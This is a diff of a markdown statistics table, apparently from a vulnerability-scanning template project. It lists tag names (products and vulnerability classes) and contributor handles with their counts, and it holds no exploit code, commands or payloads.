+| aws | 8 | kophjager007 | 3 | | | | | | | +| cve2013 | 8 | joanbono | 3 | | | | | | | +| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | +| cnvd | 8 | tess | 3 | | | | | | | +| cve2014 | 7 | hetroublemakr | 2 | | | | | | | +| joomla | 7 | mavericknerd | 2 | | | | | | | +| vmware | 7 | ree4pwn | 2 | | | | | | | +| scada | 7 | x1m_martijn | 2 | | | | | | | +| xxe | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| cms | 6 | incogbyte | 2 | | | | | | | +| backup | 6 | vavkamil | 2 | | | | | | | +| rails | 6 | gevakun | 2 | | | | | | | +| google | 6 | manas_harsh | 2 | | | | | | | +| api | 6 | afaq | 2 | | | | | | | +| nginx | 6 | random-robbie | 2 | | | | | | | +| citrix | 6 | kiblyn11 | 2 | | | | | | | +| rconfig | 6 | moritz nentwig | 2 | | | | | | | +| dell | 5 | amsda | 2 | | | | | | | +| login | 5 | lu4nx | 2 | | | | | | | +| phpmyadmin | 5 | bp0lr | 2 | | | | | | | +| iis | 5 | unstabl3 | 2 | | | | | | | +| ssti | 5 | lotusdll | 2 | | | | | | | +| confluence | 5 | dheerajmadhukar | 2 | | | | | | | +| jetty | 5 | udit_thakkur | 2 | | | | | | | +| headless | 5 | 0xcrypto | 2 | | | | | | | +| java | 5 | 0xrudra | 2 | | | | | | | +| solr | 5 | emenalf | 2 | | | | | | | +| lucee | 5 | elsfa7110 | 2 | | | | | | | +| circarlife | 5 | davidmckennirey | 2 | | | | | | | +| laravel | 5 | shifacyclewala | 2 | | | | | | | | ruijie | 5 | swissky | 2 | | | | | | | -| ssti | 5 | randomrobbie | 2 | | | | | | | -| phpmyadmin | 5 | ree4pwn | 2 | | | | | | | -| jetty | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| java | 5 | afaq | 2 | | | | | | | -| confluence | 5 | bp0lr | 2 | | | | | | | -| iis | 5 | elsfa7110 | 2 | | | | | | | -| login | 5 | 0xelkomy | 2 | | | | | | | -| cve2009 | 4 | x1m_martijn | 2 | | | | | | | -| netgear | 4 | lu4nx | 2 | | | | | | | -| nodejs | 4 | foulenzer | 2 | | | | | | | -| jolokia | 4 | shifacyclewala | 2 | | | | | | | -| solarwinds | 4 | ehsahil | 2 | | | | | | | -| traversal | 4 | dheerajmadhukar | 2 | | | | | | | -| elastic | 4 | gevakun | 2 | | | | | | | -| router | 4 | vavkamil | 2 | | | | | | | -| vpn | 4 | emenalf | 2 | | | | | | | -| thinkphp | 4 | moritz nentwig | 2 | | | | | | | -| asp | 4 | arcc | 1 | | | | | | | -| django | 4 | hakluke | 1 | | | | | | | -| hongdian | 4 | rojanrijal | 1 | | | | | | | -| moodle | 4 | naglinagli | 1 | | | | | | | -| tomcat | 4 | shifacyclewla | 1 | | | | | | | -| artifactory | 4 | pdp | 1 | | | | | | | -| samsung | 4 | dawid czarnecki | 1 | | | | | | | -| magmi | 4 | deena | 1 | | | | | | | -| webserver | 4 | raesene | 1 | | | | | | | -| thinkcmf | 4 | bjhulst | 1 | | | | | | | -| docker | 4 | bing0o | 1 | | | | | | | -| fileupload | 4 | pudsec | 1 | | | | | | | -| ibm | 4 | remonsec | 1 | | | | | | | -| kafka | 3 | koti2 | 1 | | | | | | | -| ofbiz | 3 | yashgoti | 1 | | | | | | | -| openssh | 3 | thezakman | 1 | | | | | | | -| grafana | 3 | idealphase | 1 | | | | | | | -| log | 3 | streetofhackerr007 | 1 | | | | | | | -| springcloud | 3 | c3l3si4n | 1 | | | | | | | -| nosqli | 3 | akash.c | 1 | | | | | | | -| mongodb | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| git | 3 | its0x08 | 1 | | | | | | | -| terramaster | 3 | becivells | 1 | | | | | | | -| fanruan | 3 | 0h1in9e | 1 | | | | | | | -| lfr | 3 | juicypotato1 | 1 | | | | | | | -| kubernetes | 3 | fabaff | 1 | | | | | | | -| oa | 3 | dogasantos | 1 | | | | | | | -| slack | 3 | th3.d1p4k | 1 | | | | | | | -| backups | 3 | alph4byt3 | 1 | | | | | | | -| ebs | 3 | tirtha_mandal | 1 | | | | | | | -| deserialization | 3 | j33n1k4 | 1 | | | | | | | -| microstrategy | 3 | regala_ | 1 | | | | | | | -| bypass | 3 | mohammedsaneem | 1 | | | | | | | -| dedecms | 3 | luci | 1 | | | | | | | -| crlf | 3 | ringo | 1 | | | | | | | -| vbulletin | 3 | luskabol | 1 | | | | | | | -| caucho | 3 | 0xrod | 1 | | | | | | | -| ssh | 3 | sushant kamble | 1 | | | | | | | +| drupal | 5 | jarijaas | 2 | | | | | | | +| jolokia | 4 | bsysop | 2 | | | | | | | +| artifactory | 4 | zomsop82 | 2 | | | | | | | +| hongdian | 4 | pxmme1337 | 2 | | | | | | | +| thinkcmf | 4 | 0xsapra | 2 | | | | | | | +| ibm | 4 | 0xelkomy | 2 | | | | | | | +| netgear | 4 | 0xprial | 2 | | | | | | | +| asp | 4 | joeldeleep | 2 | | | | | | | +| moodle | 4 | randomrobbie | 2 | | | | | | | +| vpn | 4 | foulenzer | 2 | | | | | | | +| traversal | 4 | ehsahil | 2 | | | | | | | +| nodejs | 4 | idealphase | 1 | | | | | | | +| tomcat | 4 | ajaysenr | 1 | | | | | | | +| webserver | 4 | bad5ect0r | 1 | | | | | | | +| elastic | 4 | chron0x | 1 | | | | | | | +| thinkphp | 4 | mhdsamx | 1 | | | | | | | +| samsung | 4 | alperenkesk | 1 | | | | | | | +| cve2009 | 4 | divya_mudgal | 1 | | | | | | | +| magmi | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| solarwinds | 4 | 0xrod | 1 | | | | | | | +| fileupload | 4 | remonsec | 1 | | | | | | | +| django | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| docker | 4 | alifathi-h1 | 1 | | | | | | | +| router | 4 | omarkurt | 1 | | | | | | | +| mongodb | 3 | 52971 | 1 | | | | | | | +| backups | 3 | bolli95 | 1 | | | | | | | +| ssh | 3 | dogasantos | 1 | | | | | | | +| caucho | 3 | tirtha_mandal | 1 | | | | | | | +| windows | 3 | @dwisiswant0 | 1 | | | | | | | +| r-seenet | 3 | pdp | 1 | | | | | | | +| slack | 3 | notsoevilweasel | 1 | | | | | | | +| fanruan | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| nacos | 3 | w4cky_ | 1 | | | | | | | +| ebs | 3 | sushant kamble | 1 | | | | | | | | | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| printer | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| nacos | 3 | taielab | 1 | | | | | | | -| windows | 3 | schniggie | 1 | | | | | | | -| amazon | 3 | kba@sogeti_esec | 1 | | | | | | | -| fpd | 3 | daviey | 1 | | | | | | | -| r-seenet | 3 | aceseven (digisec360) | 1 | | | | | | | -| resin | 3 | geraldino2 | 1 | | | | | | | -| zabbix | 2 | affix | 1 | | | | | | | -| sonarqube | 2 | _darrenmartyn | 1 | | | | | | | -| icewarp | 2 | bad5ect0r | 1 | | | | | | | -| oauth | 2 | rtcms | 1 | | | | | | | -| dos | 2 | berkdusunur | 1 | | | | | | | -| rockmongo | 2 | ipanda | 1 | | | | | | | -| seeyon | 2 | shelld3v | 1 | | | | | | | -| xxljob | 2 | 52971 | 1 | | | | | | | -| paloalto | 2 | furkansenan | 1 | | | | | | | -| odoo | 2 | johnjhacking | 1 | | | | | | | -| glassfish | 2 | @dwisiswant0 | 1 | | | | | | | -| strapi | 2 | manuelbua | 1 | | | | | | | -| wordfence | 2 | mubassirpatel | 1 | | | | | | | -| waf | 2 | undefl0w | 1 | | | | | | | -| saltstack | 2 | mah3sec_ | 1 | | | | | | | -| showdoc | 2 | cookiehanhoan | 1 | | | | | | | -| webcam | 2 | kabirsuda | 1 | | | | | | | -| ecology | 2 | iampritam | 1 | | | | | | | -| httpd | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| proxy | 2 | b4uh0lz | 1 | | | | | | | -| sharepoint | 2 | toufik airane | 1 | | | | | | | -| nagios | 2 | notsoevilweasel | 1 | | | | | | | -| hp | 2 | knassar702 | 1 | | | | | | | -| rstudio | 2 | s1r1u5_ | 1 | | | | | | | -| prometheus | 2 | nytr0gen | 1 | | | | | | | -| nexus | 2 | sy3omda | 1 | | | | | | | -| huawei | 2 | ldionmarcil | 1 | | | | | | | -| telerik | 2 | absshax | 1 | | | | | | | -| spark | 2 | co0nan | 1 | | | | | | | -| mida | 2 | tim_koopmans | 1 | | | | | | | -| chamilo | 2 | noamrathaus | 1 | | | | | | | -| smtp | 2 | sshell | 1 | | | | | | | -| trixbox | 2 | kareemse1im | 1 | | | | | | | -| mail | 2 | patralos | 1 | | | | | | | -| zhiyuan | 2 | zandros0 | 1 | | | | | | | -| hjtcloud | 2 | ahmed sherif | 1 | | | | | | | -| rockethchat | 2 | _harleo | 1 | | | | | | | -| plesk | 2 | soyelmago | 1 | | | | | | | -| frp | 2 | ajaysenr | 1 | | | | | | | -| jboss | 2 | thevillagehacker | 1 | | | | | | | -| splunk | 2 | nkxxkn | 1 | | | | | | | -| vrealize | 2 | d0rkerdevil | 1 | | | | | | | -| microsoft | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| kibana | 2 | bolli95 | 1 | | | | | | | -| leak | 2 | defr0ggy | 1 | | | | | | | -| hpe | 2 | shreyapohekar | 1 | | | | | | | -| keycloak | 2 | smaranchand | 1 | | | | | | | -| service | 2 | sicksec | 1 | | | | | | | -| bitrix | 2 | 0xtavian | 1 | | | | | | | -| jellyfin | 2 | dudez | 1 | | | | | | | -| flir | 2 | fopina | 1 | | | | | | | -| exposures | 2 | sullo | 1 | | | | | | | -| cache | 2 | mhdsamx | 1 | | | | | | | -| voipmonitor | 2 | johnk3r | 1 | | | | | | | -| bigip | 2 | micha3lb3n | 1 | | | | | | | -| emerge | 2 | wabafet | 1 | | | | | | | -| shellshock | 2 | alex | 1 | | | | | | | -| injection | 2 | omarkurt | 1 | | | | | | | -| yapi | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| openssh | 3 | ahmed sherif | 1 | | | | | | | +| bypass | 3 | rtcms | 1 | | | | | | | +| amazon | 3 | aceseven (digisec360) | 1 | | | | | | | +| lfr | 3 | jeya seelan | 1 | | | | | | | +| log | 3 | becivells | 1 | | | | | | | +| microstrategy | 3 | johnk3r | 1 | | | | | | | +| springcloud | 3 | streetofhackerr007 | 1 | | | | | | | +| fpd | 3 | mubassirpatel | 1 | | | | | | | +| terramaster | 3 | affix | 1 | | | | | | | +| deserialization | 3 | dudez | 1 | | | | | | | +| resin | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| ucmdb | 2 | ooooooo_q | 1 | | | | | | | -| intrusive | 2 | chron0x | 1 | | | | | | | -| fortios | 2 | gboddin | 1 | | | | | | | -| sonicwall | 2 | 0ut0fb4nd | 1 | | | | | | | -| pega | 2 | qlkwej | 1 | | | | | | | -| globalprotect | 2 | ratnadip gajbhiye | 1 | | | | | | | -| activemq | 2 | willd96 | 1 | | | | | | | -| cve2008 | 2 | apt-mirror | 1 | | | | | | | -| openam | 2 | _generic_human_ | 1 | | | | | | | -| coldfusion | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| openfire | 2 | divya_mudgal | 1 | | | | | | | -| hashicorp | 2 | kurohost | 1 | | | | | | | -| smb | 2 | _c0wb0y_ | 1 | | | | | | | -| maian | 2 | w4cky_ | 1 | | | | | | | -| couchdb | 2 | r3naissance | 1 | | | | | | | -| kentico | 2 | ilovebinbash | 1 | | | | | | | -| natshell | 2 | jeya seelan | 1 | | | | | | | -| nextjs | 2 | whynotke | 1 | | | | | | | -| idrac | 2 | akshansh | 1 | | | | | | | -| totaljs | 1 | exploitation | 1 | | | | | | | -| soar | 1 | ohlinge | 1 | | | | | | | -| traefik | 1 | yashanand155 | 1 | | | | | | | -| b2evolution | 1 | gal nagli | 1 | | | | | | | -| wavemaker | 1 | zhenwarx | 1 | | | | | | | -| enumeration | 1 | fmunozs | 1 | | | | | | | -| subrion | 1 | vsh00t | 1 | | | | | | | -| ems | 1 | @github.com/defr0ggy | 1 | | | | | | | -| comodo | 1 | elmahdi | 1 | | | | | | | -| yii | 1 | rodnt | 1 | | | | | | | -| htmli | 1 | yavolo | 1 | | | | | | | -| darkstat | 1 | abison_binoy | 1 | | | | | | | -| phalcon | 1 | alifathi-h1 | 1 | | | | | | | -| axis | 1 | hanlaomo | 1 | | | | | | | -| netsweeper | 1 | blckraven | 1 | | | | | | | -| jnoj | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | -| skywalking | 1 | alperenkesk | 1 | | | | | | | -| targa | 1 | flag007 | 1 | | | | | | | -| octobercms | 1 | sickwell | 1 | | | | | | | -| tpshop | 1 | andirrahmani1 | 1 | | | | | | | -| azure | 1 | vzamanillo | 1 | | | | | | | -| heroku | 1 | streetofhackerr007 (rohit | 1 | | | | | | | +| oa | 3 | rojanrijal | 1 | | | | | | | +| grafana | 3 | hanlaomo | 1 | | | | | | | +| kafka | 3 | alph4byt3 | 1 | | | | | | | +| git | 3 | mohammedsaneem | 1 | | | | | | | +| dedecms | 3 | andirrahmani1 | 1 | | | | | | | +| crlf | 3 | ilovebinbash | 1 | | | | | | | +| ofbiz | 3 | whynotke | 1 | | | | | | | +| kubernetes | 3 | alex | 1 | | | | | | | +| nosqli | 3 | c3l3si4n | 1 | | | | | | | +| printer | 3 | taielab | 1 | | | | | | | +| vbulletin | 3 | cookiehanhoan | 1 | | | | | | | +| icewarp | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| nexus | 2 | abison_binoy | 1 | | | | | | | +| service | 2 | smaranchand | 1 | | | | | | | +| bigip | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| mail | 2 | akash.c | 1 | | | | | | | +| dos | 2 | juicypotato1 | 1 | | | | | | | +| smtp | 2 | luci | 1 | | | | | | | +| leak | 2 | nytr0gen | 1 | | | | | | | +| hashicorp | 2 | vsh00t | 1 | | | | | | | +| frp | 2 | j33n1k4 | 1 | | | | | | | +| mida | 2 | defr0ggy | 1 | | | | | | | +| splunk | 2 | bing0o | 1 | | | | | | | +| httpd | 2 | thezakman | 1 | | | | | | | +| kibana | 2 | deena | 1 | | | | | | | +| zhiyuan | 2 | sy3omda | 1 | | | | | | | +| saltstack | 2 | knassar702 | 1 | | | | | | | +| rockethchat | 2 | noamrathaus | 1 | | | | | | | +| maian | 2 | _harleo | 1 | | | | | | | +| globalprotect | 2 | sullo | 1 | | | | | | | +| kentico | 2 | zandros0 | 1 | | | | | | | +| exposures | 2 | apt-mirror | 1 | | | | | | | +| cve2008 | 2 | dawid czarnecki | 1 | | | | | | | +| intrusive | 2 | manuelbua | 1 | | | | | | | +| hp | 2 | naglinagli | 1 | | | | | | | +| rstudio | 2 | ooooooo_q | 1 | | | | | | | +| flir | 2 | fopina | 1 | | | | | | | +| plesk | 2 | regala_ | 1 | | | | | | | +| rockmongo | 2 | sicksec | 1 | | | | | | | +| yapi | 2 | pudsec | 1 | | | | | | | +| injection | 2 | wabafet | 1 | | | | | | | +| activemq | 2 | ratnadip gajbhiye | 1 | | | | | | | +| sonicwall | 2 | soyelmago | 1 | | | | | | | +| sonarqube | 2 | ipanda | 1 | | | | | | | +| jboss | 2 | patralos | 1 | | | | | | | +| fortios | 2 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| discord | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| linkerd | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| igs | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| cve2010 | 1 | | | | | | | | | -| revision | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | +| openfire | 2 | 0h1in9e | 1 | | | | | | | +| pega | 2 | thevillagehacker | 1 | | | | | | | +| idrac | 2 | yashanand155 | 1 | | | | | | | +| nagios | 2 | gboddin | 1 | | | | | | | +| nextjs | 2 | flag007 | 1 | | | | | | | +| ecology | 2 | schniggie | 1 | | | | | | | +| cache | 2 | sickwell | 1 | | | | | | | +| chamilo | 2 | mah3sec_ | 1 | | | | | | | +| paloalto | 2 | fabaff | 1 | | | | | | | +| hjtcloud | 2 | sshell | 1 | | | | | | | +| strapi | 2 | @github.com/defr0ggy | 1 | | | | | | | +| ucmdb | 2 | yashgoti | 1 | | | | | | | +| bitrix | 2 | s1r1u5_ | 1 | | | | | | | +| xxljob | 2 | _c0wb0y_ | 1 | | | | | | | +| sharepoint | 2 | absshax | 1 | | | | | | | +| voipmonitor | 2 | kareemse1im | 1 | | | | | | | +| showdoc | 2 | micha3lb3n | 1 | | | | | | | +| natshell | 2 | shifacyclewla | 1 | | | | | | | +| glassfish | 2 | toufik airane | 1 | | | | | | | +| shellshock | 2 | ringo | 1 | | | | | | | +| keycloak | 2 | co0nan | 1 | | | | | | | +| oauth | 2 | kabirsuda | 1 | | | | | | | +| waf | 2 | hakluke | 1 | | | | | | | +| huawei | 2 | kurohost | 1 | | | | | | | +| wordfence | 2 | exploitation | 1 | | | | | | | +| microsoft | 2 | yavolo | 1 | | | | | | | +| odoo | 2 | nkxxkn | 1 | | | | | | | +| hpe | 2 | its0x08 | 1 | | | | | | | +| couchdb | 2 | berkdusunur | 1 | | | | | | | +| webcam | 2 | ldionmarcil | 1 | | | | | | | +| coldfusion | 2 | rodnt | 1 | | | | | | | +| spark | 2 | willd96 | 1 | | | | | | | +| trixbox | 2 | th3.d1p4k | 1 | | | | | | | +| seeyon | 2 | shreyapohekar | 1 | | | | | | | +| vrealize | 2 | undefl0w | 1 | | | | | | | +| jellyfin | 2 | luskabol | 1 | | | | | | | +| openam | 2 | elmahdi | 1 | | | | | | | +| emerge | 2 | gal nagli | 1 | | | | | | | +| smb | 2 | d0rkerdevil | 1 | | | | | | | +| zabbix | 2 | bjhulst | 1 | | | | | | | +| telerik | 2 | b4uh0lz | 1 | | | | | | | +| proxy | 2 | vzamanillo | 1 | | | | | | | +| prometheus | 2 | ohlinge | 1 | | | | | | | +| extractor | 1 | tim_koopmans | 1 | | | | | | | +| emby | 1 | arcc | 1 | | | | | | | +| razor | 1 | furkansenan | 1 | | | | | | | +| servicedesk | 1 | akshansh | 1 | | | | | | | +| discourse | 1 | qlkwej | 1 | | | | | | | +| axis | 1 | koti2 | 1 | | | | | | | +| phpunit | 1 | kba@sogeti_esec | 1 | | | | | | | +| triconsole | 1 | _generic_human_ | 1 | | | | | | | +| fuelcms | 1 | shelld3v | 1 | | | | | | | +| sco | 1 | fmunozs | 1 | | | | | | | +| zmanda | 1 | geraldino2 | 1 | | | | | | | +| anchorcms | 1 | r3naissance | 1 | | | | | | | +| drone | 1 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| postmessage | 1 | iampritam | 1 | | | | | | | +| aspnuke | 1 | _darrenmartyn | 1 | | | | | | | +| blue-ocean | 1 | 0ut0fb4nd | 1 | | | | | | | +| rdp | 1 | 0xtavian | 1 | | | | | | | +| zeroshell | 1 | blckraven | 1 | | | | | | | +| tika | 1 | daviey | 1 | | | | | | | +| sqlite | 1 | raesene | 1 | | | | | | | +| mailchimp | 1 | zhenwarx | 1 | | | | | | | +| moinmoin | 1 | johnjhacking | 1 | | | | | | | | nette | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | | linkedin | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| status | 1 | | | | | 